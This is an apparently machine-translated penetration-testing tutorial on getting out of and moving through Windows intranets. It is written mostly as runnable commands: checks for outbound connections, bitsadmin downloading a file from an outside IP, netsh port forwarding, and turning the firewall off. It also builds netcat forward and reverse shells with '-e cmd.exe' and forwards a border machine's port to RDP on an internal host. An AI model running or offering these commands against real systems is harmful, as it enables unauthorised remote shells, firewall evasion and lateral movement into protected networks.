1. Detect outgoing protocol of intranet server

windows system

1. icmp protocol out-net detection

Ping the IP address of your own vps

2. DNS protocol out-net detection

ping www.baidu.com

nslookup www.baidu.com

3. TCP out-net detection

telnet vps ip

2，nc

Attack aircraft: nc -lvvp 4444

Victim machine: nc vps-ip 4444

bitsadmin /rawreturn /transfer down "http://120.79.66.58/1.gif" d:\1.txt

powershell -exec bypass Import-Module .\telnet.ps1 Test-PortConnectivity -Source 'localhost' -RemoteDestination '192.168.3.69' -Port 110 -Iterate -protocol TCP

Second, build a protocol tunnel

1. Netsh port forwarding

Netsh is a tool that comes with windows to manage windows network configuration and firewall. The incoming tcp connection can be forwarded to
the port of the local or remote computer through netsh .

This tool can only be used with administrative rights.

Can view existing forwarding
netsh interface portproxy show all

Add a port mapping from IPV4 to IPV4 to
netsh interface portproxy add v4tov4 listenport=22 connectaddress=ip connectport=port
delete the designated forwarding port
netsh interface portproxy delete v4tov4 listenport=port

netsh advfirewall show allprofiles View the firewall status of all network types in the current system
netsh advfirewall set allprofiles state off Turn off the current system firewall
netsh advfirewall set allprofiles state on Enable the current system firewall

Create a forward shell:

1. Add a firewall policy to allow external access to port 4444 through TCP protocol

rule name: the name of the rule (any name)

dir direction action (allow, prohibit) protocol: protocol localport: local port

netsh advfirewall firewall add rule name="nc in" dir=in action=allow protocol=TCP localport=4444

2. Upload netcat-win32-1.12.zip to the target machine, switch to the directory, and execute nc.exe -lvp 4444 -e cmd.exe

3. Execute nc64.exe -nv 192.168.206.129 4444 on the attacking machine to obtain a forward shell

Create a reverse shell:

Attack aircraft

1. Add a firewall policy to the attacker and open port 4443

netsh firewall add portopening TCP 4443 “nc reverse shell”

2. The attacker monitors port 4443 nc64.exe -lvp 4443

Target machine

3. Add a firewall policy to the target machine, allowing port 4443 to pass TCP protocol

netsh advfirewall firewall add rule name="nc reverse shell" dir=out action=allow protocol=TCP
localport=4443

4. Use the previously uploaded nc tool on the target machine to connect to port 4443 of the attacking machine

nc64.exe -nv 192.168.206.1 4443 -e cmd.exe

5. Get the shell of the target machine on the attacking machine

6. Although the link is successfully established, there is no response and the command cannot be executed

7. Through layer-by-layer investigation, it turns out that the victim machine is 64-bit, so nc64.exe should be used instead of nc.exe

8. The attacker got the victim's shell

You can see that the victim machine uses port 49169 to establish a link with port 4443 of the attack machine. ESTABLISHED (established) pid:2560

CLOSE_WAIT The other party actively closed the connection or the network is abnormal and the connection is interrupted

9.tasklist /svc | findstr "2560" found through pid is the connection established by nc64.exe

10, wmic process query detailed process information

Forward military zone server port

Boundary machine

1. Add a firewall policy to the border machine to allow port 8888 to connect

netsh advfirewall firewall add rule name="3389 test" dir=in action=allow protocol=TCP localport=8888

2. Add a firewall policy to forward the traffic of the attacker's access to port 8888 of the border machine to port 33389 of the host in the military zone

netsh interface portproxy add v4tov4 listenport=8888 connectaddress=192.168.52.129 connectport=3389